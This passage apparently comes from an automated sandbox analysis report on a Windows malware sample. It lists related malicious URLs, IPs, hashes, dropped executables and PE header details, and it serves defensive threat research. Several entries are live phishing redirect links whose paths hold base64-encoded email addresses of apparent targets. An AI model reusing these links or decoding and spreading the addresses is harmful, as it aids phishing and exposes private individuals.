                                                          • 104.26.0.100
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.0.100
                                                          http://braintumourresearch.orgGet hashmaliciousUnknownBrowse
                                                          • 104.26.1.100
                                                          https://www.filemail.com/t/NU6GESpWGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                          • 104.26.0.100
                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                                          • 172.67.70.233
                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29tGet hashmaliciousTycoon2FABrowse
                                                          • 104.26.1.100
                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2Ff1mgxnH4u4JYtjrvS13irZ65/am9zZWUub3VlbGxldEBjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                          • 104.26.0.100
                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                          • 172.67.70.233
                                                          api.telegram.orgnuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          DOC11042024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Dbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                          • 149.154.167.220

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TELEGRAMRUnuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          DOC11042024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Dbt5vPZaOa.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                          • 149.154.167.220
                                                          CLOUDFLARENETUSEROctober 31, 2024_Amendment_for_J.thepautIyNURVhUTlVNUkFORE9NMTkjIw==-1.htmlGet hashmaliciousUnknownBrowse
                                                          • 104.21.55.69
                                                          nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 104.26.1.100
                                                          pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 104.26.1.100
                                                          QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          file.exeGet hashmaliciousLummaC, StealcBrowse
                                                          • 188.114.97.3
                                                          Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 188.114.96.3
                                                          Request for Quotation MK FMHSRFQ241104.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 188.114.96.3
                                                          Request for Quotation_MYMRT.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          BELCLOUDBGrhqubIGcyN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Clipboard Hijacker, Cryptbot, MicroClip, Neoreklami, RedLineBrowse
                                                          • 185.244.181.140
                                                          jYDYjpSbvf.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC Stealer, RedLine, SmokeLoader, StealcBrowse
                                                          • 185.244.181.140
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          Z2LPSpO1yU.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.244.181.140
                                                          81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                          • 91.92.137.228

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0enuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          pdLBHF2jCE.exeGet hashmaliciousPhemedrone StealerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          Fattura88674084.vbsGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          givingbestthignswithgreatheatcaptialthingstodo.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          Request for Quotation MK FMHSRFQ241104.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          Purchase order.vbsGet hashmaliciousUnknownBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          Permintaan Untuk Sebutharga RFQ 087624.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233
                                                          EE85716273#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 149.154.167.220
                                                          • 86.104.15.60
                                                          • 172.67.70.233

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          :newads (copy)

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):252416
                                                          Entropy (8bit):5.259604942685469
                                                          Encrypted:false
                                                          SSDEEP:3072:YlXc8ISCQhQzh6OVoWlq5OiUG5QivXsP1zpKHDkO7UN2ET:yUSbSzh6OzgOiUOvrU0
                                                          MD5:BCB323EB0CFD10D58CF134BC7BDC8D67
                                                          SHA1:C34A8C428B715B67B696819FC1D172708A23D3F3
                                                          SHA-256:6D1A5864D641F2DA852BFCED96A305A41B6464DC12A944883985A4C305A9D8C3
                                                          SHA-512:BAC5411C794A1B473B628C5B261BEF5A830A6FED5A797C785AC3F3370DEF8F91DB2368DB8EA13D91ECE0B89AB6109B64E3ECDDCD27D15B2D7CC6F29216A57255
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E(.g.........."...0..............M... ...`....@.. .......................@......J~....`..................................L..S....`....................... ....................................................... ............... ..H............text...4-... ...................... ..`.rsrc........`.......0..............@..@.reloc....... ......................@..B.................M......H............p......[...................................................PK......................................PK......PK......PK......PK....{....*..{....*V.(......}......}....*. .s.. )UU.Z( ....{....o$...X )UU.Z("....{....o%...X*..{(...*..{)...*V.(......}(.....})...*. (... )UU.Z( ....{(...o$...X )UU.Z("....{)...o%...X*..{*...*..{+...*V.(......}*.....}+...*. .<f. )UU.Z( ....{*...o$...X )UU.Z("....{+...o%...X*..{,...*..{-...*V.(......},.....}-...*. .Pl. )UU.Z( ....{,...o$...X

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WDSecureUtilities_548.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1498
                                                          Entropy (8bit):5.364175471524945
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhBsXE4NpOKIE4TKBGKoC1qE4GIsGAE4KKUN8E4KD:MxHKQwYHKGSI6okHNpOtHTHK1qHGIsGX
                                                          MD5:50F486DF837CEA053D0408A8A59A67C7
                                                          SHA1:369DDB14668BEF8A2D08428B78E6A9BAEBE0FFA2
                                                          SHA-256:8D5B805F47B9638841BB8B45839CD0977CEC5C39593F0BBA62CA5D68241B7B70
                                                          SHA-512:73B4DD94A0F8D1D81B5776C7A742DD9DF39B33F9B2ABE516EEAAEFB24F7521117C3702E3BEF7E9A55D8C7BB7F8718AA07FBE5B96B87C9AE22B3075B6644935A5
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_6

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19253
                                                          Entropy (8bit):5.005546805196593
                                                          Encrypted:false
                                                          SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeho+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiho+OdBANZD
                                                          MD5:F6D5AAADB944E11B39EF4722CC9A3547
                                                          SHA1:4899D19668B0BC084059BA568A8E1F3DE2964D37
                                                          SHA-256:D2F8DE3B410C036BEE14DEA64D6C4C46F78B0C1D607704074988BB161C910F61
                                                          SHA-512:EF6C70F8EF5ED80A580D17567C2F7970C9F34ED2ECF4C00CBE2975596D8DF6FC4CE1BB3EE9D03B5FCFC5B2506751F581B702E1C60381A5A29D8A113EC2557EE1
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllulbnolz:NllUc
                                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                          Malicious:false
                                                          Preview:@...e................................................@..........

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlw22fuk.nbi.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fd2yte1d.yla.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5cl24gm.0gg.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yc5q0d25.m4d.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):252416
                                                          Entropy (8bit):5.259604942685469
                                                          Encrypted:false
                                                          SSDEEP:3072:YlXc8ISCQhQzh6OVoWlq5OiUG5QivXsP1zpKHDkO7UN2ET:yUSbSzh6OzgOiUOvrU0
                                                          MD5:BCB323EB0CFD10D58CF134BC7BDC8D67
                                                          SHA1:C34A8C428B715B67B696819FC1D172708A23D3F3
                                                          SHA-256:6D1A5864D641F2DA852BFCED96A305A41B6464DC12A944883985A4C305A9D8C3
                                                          SHA-512:BAC5411C794A1B473B628C5B261BEF5A830A6FED5A797C785AC3F3370DEF8F91DB2368DB8EA13D91ECE0B89AB6109B64E3ECDDCD27D15B2D7CC6F29216A57255
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E(.g.........."...0..............M... ...`....@.. .......................@......J~....`..................................L..S....`....................... ....................................................... ............... ..H............text...4-... ...................... ..`.rsrc........`.......0..............@..@.reloc....... ......................@..B.................M......H............p......[...................................................PK......................................PK......PK......PK......PK....{....*..{....*V.(......}......}....*. .s.. )UU.Z( ....{....o$...X )UU.Z("....{....o%...X*..{(...*..{)...*V.(......}(.....})...*. (... )UU.Z( ....{(...o$...X )UU.Z("....{)...o%...X*..{*...*..{+...*V.(......}*.....}+...*. .<f. )UU.Z( ....{*...o$...X )UU.Z("....{+...o%...X*..{,...*..{-...*V.(......},.....}-...*. .Pl. )UU.Z( ....{,...o$...X

                                                          Static File Info

                                                          General

                                                          File type:PE32+ executable (console) x86-64, for MS Windows
                                                          Entropy (8bit):6.254511736164471
                                                          TrID:
                                                          • Win64 Executable Console (202006/5) 92.65%
                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                          • DOS Executable Generic (2002/1) 0.92%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:DBp7mBJwqD.exe
                                                          File size:14'848'000 bytes
                                                          MD5:c5d36c7404a03ec6df8024737d97a0c8
                                                          SHA1:9a213e487337376c38e0cfdac240dc6ffb5fdc1e
                                                          SHA256:86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354
                                                          SHA512:812a21f479c56716d892df32a1f910b41310f74de13641d93654a0a722705fb90e114081f2af2ef8c4717febb05715183c0d6deb36bb135f819553c9a9e49216
                                                          SSDEEP:196608:MUehdkSzJ4bvuLE5rUSW9rWWsPbWIBMWRlHbLVb4zH:M94x5r1CrWWsTWIfN8
                                                          TLSH:7EE68D52E7CE10E1C55B807C499BC672FA3EB44587304FEB85498B72DE23AA4973B385
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........qQ.."Q.."Q.."X.2"C.."A..#S.."A..#U.."A..#[.."A.\"P.."H..#}.."#..#P.."#..#@.."Q.."c.."A..#E.."Q.."P.."...#P.."...#P.."RichQ..

                                                          File Icon

                                                          Icon Hash:90cececece8e8eb0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x14071690c
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x140000000
                                                          Subsystem:windows cui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x672879C1 [Mon Nov 4 07:37:37 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:a0f58d96494ecd8101f0c759318da60c

                                                          Entrypoint Preview

                                                          Instruction
                                                          dec eax
                                                          sub esp, 28h
                                                          call 00007FC154B99ED0h
                                                          dec eax
                                                          add esp, 28h
                                                          jmp 00007FC154B99747h
                                                          int3
                                                          int3
                                                          dec eax
                                                          sub esp, 28h
                                                          dec ebp
                                                          mov eax, dword ptr [ecx+38h]
                                                          dec eax
                                                          mov ecx, edx
                                                          dec ecx
                                                          mov edx, ecx
                                                          call 00007FC154B998E2h
                                                          mov eax, 00000001h
                                                          dec eax
                                                          add esp, 28h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          inc eax
                                                          push ebx
                                                          inc ebp
                                                          mov ebx, dword ptr [eax]
                                                          dec eax
                                                          mov ebx, edx
                                                          inc ecx
                                                          and ebx, FFFFFFF8h
                                                          dec esp
                                                          mov ecx, ecx
                                                          inc ecx
                                                          test byte ptr [eax], 00000004h
                                                          dec esp
                                                          mov edx, ecx
                                                          je 00007FC154B998E5h
                                                          inc ecx
                                                          mov eax, dword ptr [eax+08h]
                                                          dec ebp
                                                          arpl word ptr [eax+04h], dx
                                                          neg eax
                                                          dec esp
                                                          add edx, ecx
                                                          dec eax
                                                          arpl ax, cx
                                                          dec esp
                                                          and edx, ecx
                                                          dec ecx
                                                          arpl bx, ax
                                                          dec edx
                                                          mov edx, dword ptr [eax+edx]
                                                          dec eax
                                                          mov eax, dword ptr [ebx+10h]
                                                          mov ecx, dword ptr [eax+08h]
                                                          dec eax
                                                          mov eax, dword ptr [ebx+08h]
                                                          test byte ptr [ecx+eax+03h], 0000000Fh
                                                          je 00007FC154B998DDh
                                                          movzx eax, byte ptr [ecx+eax+03h]
                                                          and eax, FFFFFFF0h
                                                          dec esp
                                                          add ecx, eax
                                                          dec esp
                                                          xor ecx, edx
                                                          dec ecx
                                                          mov ecx, ecx
                                                          pop ebx
                                                          jmp 00007FC154B998EAh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          nop word ptr [eax+eax+00000000h]
                                                          dec eax
                                                          cmp ecx, dword ptr [0000B0C9h]
                                                          jne 00007FC154B998E2h
                                                          dec eax
                                                          rol ecx, 10h
                                                          test cx, FFFFh
                                                          jne 00007FC154B998D3h
                                                          ret
                                                          dec eax
                                                          ror ecx, 10h
                                                          jmp 00007FC154B9990Bh
                                                          int3
                                                          int3
                                                          inc eax
                                                          push ebx
                                                          dec eax

                                                          Rich Headers

                                                          Programming Language:
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x71dc800x6f0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x71e3700x154.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x7230000x9e4.pdata
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xe1f0000xa130.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x71d1500x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x71d0100x140.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x7180000x630.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x71680c0x7170008e91aafa86e16efcb8fc6dd2bdf79c07unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x7180000x799c0x8000690b5f309cbde25ff7bef4c9e17d54b8False0.4840087890625data5.763993267407936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x7200000x25200x20002fd304a398b0b63c2976d61915182dfaFalse0.27587890625data3.8753769253495967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .pdata0x7230000x9e40x10007caf23b65919fce254c79a58f85024d1False0.325439453125data3.7131375757505425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .rodata0x7240000xa3600xb000ae0f63af4570c7fe645dd589fbb0d10bFalse0.3878506747159091data4.465858318841145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
